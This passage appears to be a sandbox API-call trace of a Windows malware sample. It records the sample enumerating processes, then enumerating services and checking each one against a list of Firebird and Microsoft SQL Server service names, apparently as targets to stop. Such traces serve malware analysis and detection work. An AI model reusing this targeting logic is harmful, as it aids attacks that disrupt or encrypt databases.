	[0164.071] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0164.072] lstrlenW (lpString="winlogon.exe") returned 12
	[0164.072] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0164.072] lstrlenW (lpString="services.exe") returned 12
	[0164.072] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0164.072] lstrlenW (lpString="lsass.exe") returned 9
	[0164.072] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0164.073] lstrlenW (lpString="lsm.exe") returned 7
	[0164.073] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.073] lstrlenW (lpString="svchost.exe") returned 11
	[0164.073] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.073] lstrlenW (lpString="svchost.exe") returned 11
	[0164.073] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.074] lstrlenW (lpString="svchost.exe") returned 11
	[0164.074] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.074] lstrlenW (lpString="svchost.exe") returned 11
	[0164.074] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.074] lstrlenW (lpString="svchost.exe") returned 11
	[0164.074] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0164.075] lstrlenW (lpString="audiodg.exe") returned 11
	[0164.075] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.075] lstrlenW (lpString="svchost.exe") returned 11
	[0164.075] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.075] lstrlenW (lpString="svchost.exe") returned 11
	[0164.075] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0164.075] lstrlenW (lpString="spoolsv.exe") returned 11
	[0164.075] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0164.076] lstrlenW (lpString="svchost.exe") returned 11
	[0164.076] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0164.076] lstrlenW (lpString="taskhost.exe") returned 12
	[0164.076] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0164.076] lstrlenW (lpString="userinit.exe") returned 12
	[0164.076] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0164.077] lstrlenW (lpString="dwm.exe") returned 7
	[0164.077] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0164.077] lstrlenW (lpString="explorer.exe") returned 12
	[0164.077] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0164.077] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0164.077] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0164.078] lstrlenW (lpString="reader_sl.exe") returned 13
	[0164.078] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0164.078] lstrlenW (lpString="drvinst.exe") returned 11
	[0164.078] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0164.078] lstrlenW (lpString="taskhost.exe") returned 12
	[0164.078] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0164.079] lstrlenW (lpString="consent.exe") returned 11
	[0164.079] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0
	[0164.079] CloseHandle (hObject=0x3d0) returned 1
	[0164.079] Sleep (dwMilliseconds=0x1f4) 
	[0164.681] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0164.681] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0164.682] GetLastError () returned 0xea
	[0164.682] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0164.682] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0164.682] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0164.682] lstrlenW (lpString="Appinfo") returned 7
	[0164.682] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0164.683] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0164.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0164.683] lstrlenW (lpString="AudioSrv") returned 8
	[0164.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0164.683] lstrlenW (lpString="BFE") returned 3
	[0164.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0164.683] lstrlenW (lpString="CryptSvc") returned 8
	[0164.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0164.683] lstrlenW (lpString="CscService") returned 10
	[0164.683] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0164.683] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0164.683] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0164.683] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0164.684] lstrlenW (lpString="DcomLaunch") returned 10
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0164.684] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0164.684] lstrlenW (lpString="Dhcp") returned 4
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0164.684] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0164.684] lstrlenW (lpString="Dnscache") returned 8
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0164.684] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0164.684] lstrlenW (lpString="DPS") returned 3
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0164.684] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0164.684] lstrlenW (lpString="eventlog") returned 8
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0164.684] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0164.684] lstrlenW (lpString="EventSystem") returned 11
	[0164.684] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0164.684] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0164.684] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0164.685] lstrlenW (lpString="gpsvc") returned 5
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0164.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0164.685] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0164.685] lstrlenW (lpString="iphlpsvc") returned 8
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0164.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0164.685] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0164.685] lstrlenW (lpString="LanmanServer") returned 12
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0164.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0164.685] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0164.685] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0164.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0164.685] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0164.685] lstrlenW (lpString="lmhosts") returned 7
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0164.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0164.685] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0164.685] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0164.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0164.685] lstrlenW (lpString="MMCSS") returned 5
	[0164.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0164.686] lstrlenW (lpString="MpsSvc") returned 6
	[0164.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0164.686] lstrlenW (lpString="Netman") returned 6
	[0164.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0164.686] lstrlenW (lpString="netprofm") returned 8
	[0164.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0164.686] lstrlenW (lpString="NlaSvc") returned 6
	[0164.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0164.686] lstrlenW (lpString="nsi") returned 3
	[0164.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0164.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0164.686] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0164.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0164.686] lstrlenW (lpString="PcaSvc") returned 6
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0164.687] lstrlenW (lpString="PlugPlay") returned 8
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0164.687] lstrlenW (lpString="Power") returned 5
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0164.687] lstrlenW (lpString="ProfSvc") returned 7
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0164.687] lstrlenW (lpString="RpcEptMapper") returned 12
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0164.687] lstrlenW (lpString="RpcSs") returned 5
	[0164.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0164.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0164.687] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0164.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0164.688] lstrlenW (lpString="SamSs") returned 5
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0164.688] lstrlenW (lpString="Schedule") returned 8
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0164.688] lstrlenW (lpString="SENS") returned 4
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0164.688] lstrlenW (lpString="ShellHWDetection") returned 16
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0164.688] lstrlenW (lpString="Spooler") returned 7
	[0164.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0164.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0164.688] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0164.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
